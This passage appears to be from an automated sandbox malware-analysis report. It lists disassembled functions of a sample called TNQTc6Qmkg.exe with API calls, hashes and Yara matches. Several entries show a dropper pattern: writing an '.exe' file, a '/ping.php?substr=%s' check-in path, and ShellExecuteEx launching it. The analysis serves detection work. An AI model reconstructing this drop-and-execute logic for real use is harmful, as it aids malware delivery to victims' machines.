                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Exception@8Throwstd::system_error::system_error
                                                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                        • API String ID: 1589814233-1866435925
                                                                                                                                                        • Opcode ID: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
                                                                                                                                                        • Instruction ID: e154b9f444e369befffee57ff699e9c141b04c4d0561678f3d19f5bf610271a8
                                                                                                                                                        • Opcode Fuzzy Hash: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
                                                                                                                                                        • Instruction Fuzzy Hash: AEF0226280031CB7DB10BAA18C02FEA7B988F0A754F21C03BFD40361E0E77D5A0482ED
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002), ref: 00413A8C
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413A9F
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000), ref: 00413AC2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                        • Opcode ID: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
                                                                                                                                                        • Instruction ID: 222490b34c4e53a5feae2b87ffa662e2080e553be967456abbd25fb90b6b76cf
                                                                                                                                                        • Opcode Fuzzy Hash: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
                                                                                                                                                        • Instruction Fuzzy Hash: 1EF08130A10218FBDB109F91DC09BAEBFB8EF54752F400069F809A2290DB344E45CA9C
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
                                                                                                                                                        • Instruction ID: 8a359e14c45651228645608f035b409ab28a29202d4d86ad510780458da2c827
                                                                                                                                                        • Opcode Fuzzy Hash: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
                                                                                                                                                        • Instruction Fuzzy Hash: 9F717035A043169BCB25DF54C884BBEBB76FF41361F18522AE851A72D0E7709982C7B0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 00476586db13df40ae9b4ca52299d21b8cb0f2ee272e828588998c86b833e952
                                                                                                                                                        • Instruction ID: b33920a143986800139fcf22d81ba1a33bebe7e0c53b62ede7835c02ac38fde1
                                                                                                                                                        • Opcode Fuzzy Hash: 00476586db13df40ae9b4ca52299d21b8cb0f2ee272e828588998c86b833e952
                                                                                                                                                        • Instruction Fuzzy Hash: 9E712A71D062969BCB308F94C844AFFBB76EF41360F14022BE91457280D774ACE1C7AA
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                        • Opcode ID: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
                                                                                                                                                        • Instruction ID: b44a348ea030c3f2a9a2e64aef92cf816a96e42b561a2f897ee081d6ec3143e6
                                                                                                                                                        • Opcode Fuzzy Hash: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
                                                                                                                                                        • Instruction Fuzzy Hash: 5B41F136A003049FDB24DF78D884B6DB7B2FF85314B15556AD955EB290DA31E901CB80
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                        • Opcode ID: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
                                                                                                                                                        • Instruction ID: 119d67276799711db09ecd5bf14b9939420992e10a89990823b09dedeceb6b84
                                                                                                                                                        • Opcode Fuzzy Hash: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
                                                                                                                                                        • Instruction Fuzzy Hash: F941E232E00700EBCB15DF79C880A9EB7B1EF89318B1545AAE515EB392D634AD41CB84
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0041197C,?,00000000,?,00000001,?,?,00000001,0041197C,?), ref: 0041B34D
                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 0041B385
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041B3D6
                                                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00410DD1,?), ref: 0041B3E8
                                                                                                                                                        • __freea.LIBCMT ref: 0041B3F1
                                                                                                                                                          • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 313313983-0
                                                                                                                                                        • Opcode ID: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
                                                                                                                                                        • Instruction ID: fe6b59a793102c77a27ef18a3bbb39662c21b96f940faf78fbed62ac6a6f166a
                                                                                                                                                        • Opcode Fuzzy Hash: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
                                                                                                                                                        • Instruction Fuzzy Hash: 3831BF72A0021A9BDB249F65CC41EEF7BA5EB40310F04012EFC14D7291EB39DDA1CB99
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 05D0E673
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 05D0E696
                                                                                                                                                          • Part of subcall function 05D07CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05D07CDE
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 05D0E6BC
                                                                                                                                                        • _free.LIBCMT ref: 05D0E6CF
                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 05D0E6DE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 336800556-0
                                                                                                                                                        • Opcode ID: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
                                                                                                                                                        • Instruction ID: 92372c3d791ba24b1bee5b2e57f6b3afc6f1caa5ac1b76cb6c6bad4e8eabc7e6
                                                                                                                                                        • Opcode Fuzzy Hash: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
                                                                                                                                                        • Instruction Fuzzy Hash: 2201D472B052157B633116B66C8CE7B7B6DEAC2AA0394193BF909D6280DE61CC02D1B9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0041E40C
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E42F
                                                                                                                                                          • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041E455
                                                                                                                                                        • _free.LIBCMT ref: 0041E468
                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041E477
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 336800556-0
                                                                                                                                                        • Opcode ID: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
                                                                                                                                                        • Instruction ID: e222fc366bdc9891f1000934aff4c77bc857fdd668f389f9b834644977e06484
                                                                                                                                                        • Opcode Fuzzy Hash: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
                                                                                                                                                        • Instruction Fuzzy Hash: 9001847AA012157B27211AB75C8CDFB6A6DDEC6FA4315012AFD08D3201DE688C82C5B9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,05D025ED,05D07307,?,05D06FAE,00000001,00000364,?,05CFE697,?,?,?,05CFED94,?), ref: 05D07009
                                                                                                                                                        • _free.LIBCMT ref: 05D0703E
                                                                                                                                                        • _free.LIBCMT ref: 05D07065
                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 05D07072
                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 05D0707B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                                        • Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
                                                                                                                                                        • Instruction ID: 353481b04d385a037086cc1ebdb5fede21945ee67f47aa879195f2b759c20901
                                                                                                                                                        • Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
                                                                                                                                                        • Instruction Fuzzy Hash: 6301D1767446006B963267796C8CF6F223EEBC1271B202227F416AA2D0EE61E8928175
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00412386,004170A0,?,00416D47,00000001,00000364,?,0040E430,?,?,?,0040EB2D,?), ref: 00416DA2
                                                                                                                                                        • _free.LIBCMT ref: 00416DD7
                                                                                                                                                        • _free.LIBCMT ref: 00416DFE
                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00416E0B
                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00416E14
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                                        • Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
                                                                                                                                                        • Instruction ID: 6e49a9887b0250ccd633565296769d6b3062fe87a49412782ccaa8615f8c8364
                                                                                                                                                        • Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
                                                                                                                                                        • Instruction Fuzzy Hash: C201F9363847106792217676BC85EEB262D9BC5374763027FF819922D2EF3DCC92505D
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • _free.LIBCMT ref: 0041ED86
                                                                                                                                                          • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
                                                                                                                                                          • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2
                                                                                                                                                        • _free.LIBCMT ref: 0041ED98
                                                                                                                                                        • _free.LIBCMT ref: 0041EDAA
                                                                                                                                                        • _free.LIBCMT ref: 0041EDBC
                                                                                                                                                        • _free.LIBCMT ref: 0041EDCE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                        • Opcode ID: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
                                                                                                                                                        • Instruction ID: d5ef32133b98e4fb2412931fa35fae6bc57e2fe493cbd1108eefdbae164f4dde
                                                                                                                                                        • Opcode Fuzzy Hash: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
                                                                                                                                                        • Instruction Fuzzy Hash: 6DF04F32544310ABCA20EB6AF885DDB73E9BA44714755181AF848D7640C638FCC0865D
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • _free.LIBCMT ref: 05D05537
                                                                                                                                                          • Part of subcall function 05D06501: HeapFree.KERNEL32(00000000,00000000,?,05D0F288,?,00000000,?,00000000,?,05D0F52C,?,00000007,?,?,05D0F920,?), ref: 05D06517
                                                                                                                                                          • Part of subcall function 05D06501: GetLastError.KERNEL32(?,?,05D0F288,?,00000000,?,00000000,?,05D0F52C,?,00000007,?,?,05D0F920,?,?), ref: 05D06529
                                                                                                                                                        • _free.LIBCMT ref: 05D05549
                                                                                                                                                        • _free.LIBCMT ref: 05D0555C
                                                                                                                                                        • _free.LIBCMT ref: 05D0556D
                                                                                                                                                        • _free.LIBCMT ref: 05D0557E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                        • Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
                                                                                                                                                        • Instruction ID: d6c581b52540ce9a2c4c6032375347a54b35d8d317fefbfb72152168d5e33ffa
                                                                                                                                                        • Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
                                                                                                                                                        • Instruction Fuzzy Hash: 58F0BDB09115109BDA26AF54FC487193761FB04710312756FE514562BCDF3686A1CEDA
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • _free.LIBCMT ref: 004152D0
                                                                                                                                                          • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
                                                                                                                                                          • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2
                                                                                                                                                        • _free.LIBCMT ref: 004152E2
                                                                                                                                                        • _free.LIBCMT ref: 004152F5
                                                                                                                                                        • _free.LIBCMT ref: 00415306
                                                                                                                                                        • _free.LIBCMT ref: 00415317
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                        • Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
                                                                                                                                                        • Instruction ID: 804699b6a5c80bac2842bae3f4e6e7460cbec33686f784624dec7bd42b1af61a
                                                                                                                                                        • Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
                                                                                                                                                        • Instruction Fuzzy Hash: 41F030714413209B8A16BF15FC416893B60FB4871831275AFF50866275CB3959918FCE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 0-2895899722
                                                                                                                                                        • Opcode ID: 307271cf07234a17719cc341c6256f3d9491265c04953d18a9bfb7d8f1260d71
                                                                                                                                                        • Instruction ID: ae3557305dc9c54a6d59b1edd30c6b9f9c56a404ae947bd98c264bdf0008d32a
                                                                                                                                                        • Opcode Fuzzy Hash: 307271cf07234a17719cc341c6256f3d9491265c04953d18a9bfb7d8f1260d71
                                                                                                                                                        • Instruction Fuzzy Hash: EF51D171D00209ABDB10AFA9C845FEF7BB8AF45314F12015BE804B7292D778D982CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\TNQTc6Qmkg.exe,00000104), ref: 05D0356A
                                                                                                                                                        • _free.LIBCMT ref: 05D03635
                                                                                                                                                        • _free.LIBCMT ref: 05D0363F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                                                        • String ID: C:\Users\user\Desktop\TNQTc6Qmkg.exe
                                                                                                                                                        • API String ID: 2506810119-2181145923
                                                                                                                                                        • Opcode ID: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
                                                                                                                                                        • Instruction ID: c4ade8bd5711b7ffe0b981d80b37ba00f4a98710ac9c88130b0f46b2835d8e34
                                                                                                                                                        • Opcode Fuzzy Hash: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
                                                                                                                                                        • Instruction Fuzzy Hash: 6631B2B1A04258AFDB21DF99DC88FAEBBFDEB85710F105467E50597290DB70CA40CBA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\TNQTc6Qmkg.exe,00000104), ref: 00413303
                                                                                                                                                        • _free.LIBCMT ref: 004133CE
                                                                                                                                                        • _free.LIBCMT ref: 004133D8
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                                                        • String ID: C:\Users\user\Desktop\TNQTc6Qmkg.exe
                                                                                                                                                        • API String ID: 2506810119-2181145923
                                                                                                                                                        • Opcode ID: 7252df08df779396c6a9f828a3f268b946ea2b753614b366170cf5b7b8345a46
                                                                                                                                                        • Instruction ID: e0cf6dde0ac7f492d26fb7a27bfd3cf8f71fda75d9391d43b3cd8632259efb82
                                                                                                                                                        • Opcode Fuzzy Hash: 7252df08df779396c6a9f828a3f268b946ea2b753614b366170cf5b7b8345a46
                                                                                                                                                        • Instruction Fuzzy Hash: 72319371A0021CABDB219F9698819DEBBB8EB85315F1041ABED14D7210DB799A81CB9C
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • ShellExecuteEx.SHELL32(?), ref: 05D167B9
                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00008000), ref: 05D167CD
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 05D167D6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseExecuteHandleObjectShellSingleWait
                                                                                                                                                        • String ID: .exe
                                                                                                                                                        • API String ID: 3837156514-4119554291
                                                                                                                                                        • Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
                                                                                                                                                        • Instruction ID: 83965656ada51ac746576e9e6aa24391db129e7a31d7ec19e10ba56d2a8eb695
                                                                                                                                                        • Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
                                                                                                                                                        • Instruction Fuzzy Hash: 0A017831E0021CEBDF15DFA9E8459DDBBB8FF08740F008126F801A6260EB709A45CF84
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,05D15B74,00000001,?,/ping.php?substr=%s), ref: 05D164C4
                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,05D15B74,00000001,?,/ping.php?substr=%s,?), ref: 05D164DC
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,05D15B74,00000001,?,/ping.php?substr=%s,?), ref: 05D164E5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                                                                                        • String ID: .exe
                                                                                                                                                        • API String ID: 1065093856-4119554291
                                                                                                                                                        • Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
                                                                                                                                                        • Instruction ID: c2386cb752dd9204bfc00167bc1a58a135f967d9eedb077fc097ae62e585692e
                                                                                                                                                        • Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
                                                                                                                                                        • Instruction Fuzzy Hash: B0E06572601124BBD7311B99AC48FA7BE6CEF855A0F040125FB05D21109661DC0197B8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1036877536-0
                                                                                                                                                        • Opcode ID: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
                                                                                                                                                        • Instruction ID: 9f6d9696b84bcf24ccd742302a98f916931f727bb7a224befeee8c5d89b2fbcf
                                                                                                                                                        • Opcode Fuzzy Hash: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
